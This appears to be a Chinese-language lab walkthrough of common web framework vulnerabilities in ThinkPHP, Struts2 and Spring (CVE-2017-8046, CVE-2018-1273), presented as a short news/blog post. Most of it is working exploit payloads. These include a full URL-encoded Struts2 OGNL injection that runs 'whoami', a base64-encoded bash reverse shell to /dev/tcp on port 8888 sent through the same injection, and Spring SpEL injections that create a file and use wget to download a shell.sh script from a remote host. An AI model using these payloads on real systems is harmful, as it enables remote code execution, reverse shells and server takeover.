当前位置：首页 > news >正文

常⻅框架漏洞

news 2025/8/4 12:39:33

一.Thinkphp(TP)

1.用fofa查询

body="thinkphp V5"

放在蓝鲸中扫描

二.struts2

1.启动环境,打开页面

http://8.152.98.193:8080/struts2-showcase/

2.执行命令

http://8.152.98.193:8080/struts2-showcase/${(123+123)}/actionChain1.action

用url编码

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#
request['struts.valueStack'].context).(#cr=#ct['com.o
pensymphony.xwork2.ActionContext.container']).(#ou=#cr.getIns
tance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcl
udedPackageNames().clear()).(#ou.getExcludedClasses().cle
ar()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Run
time@getRuntime().exec('whoami')).(@o
rg.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

访问

http://8.152.98.193:8080/struts2-showcase/%24%7B
(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23
request%5B%27struts.valueStack%27%5D.context).(%23cr%3D%23ct%5B%27com.o
pensymphony.xwork2.ActionContext.container%27%5D).(%23ou%3D%23cr.getIns
tance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcl
udedPackageNames().clear()).(%23ou.getExcludedClasses().cle
ar()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Run
time%40getRuntime().exec(%27whoami%27)).(%40o
rg.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action

将bash -i >& /dev/tcp/8.152.98.193/8888 0>&1base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1Mi45OC4xOTMvODg4OCAwPiYx

用url编码

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1Mi45OC4xOTMvODg4OCAwPiYx}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

访问

http://8.152.98.193:8080/struts2-showcase/%24%7B
(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B%27struts.valueStack%27%5D.context).(%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC84LjE1Mi45OC4xOTMvODg4OCAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action

三.Spring

1.Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

1.启动环境（改配置 version: "3")

2.访问http://8.152.98.193:8080/customers/1，并抓包

2.spring 代码执⾏（CVE-2018-1273）

1.启动环境（改配置 version: "3")

http://8.152.98.193:8080/users

2.填写注册信息，bp抓包：

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t

ouch /tmp/crz")]=&password=&repeatedPassword=

上传一个shell.sh的脚本

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/usr/bin/wget -qO /tmp/shell.sh http://8.152.98.193/shell.sh")]=&password=&repeatedPassword=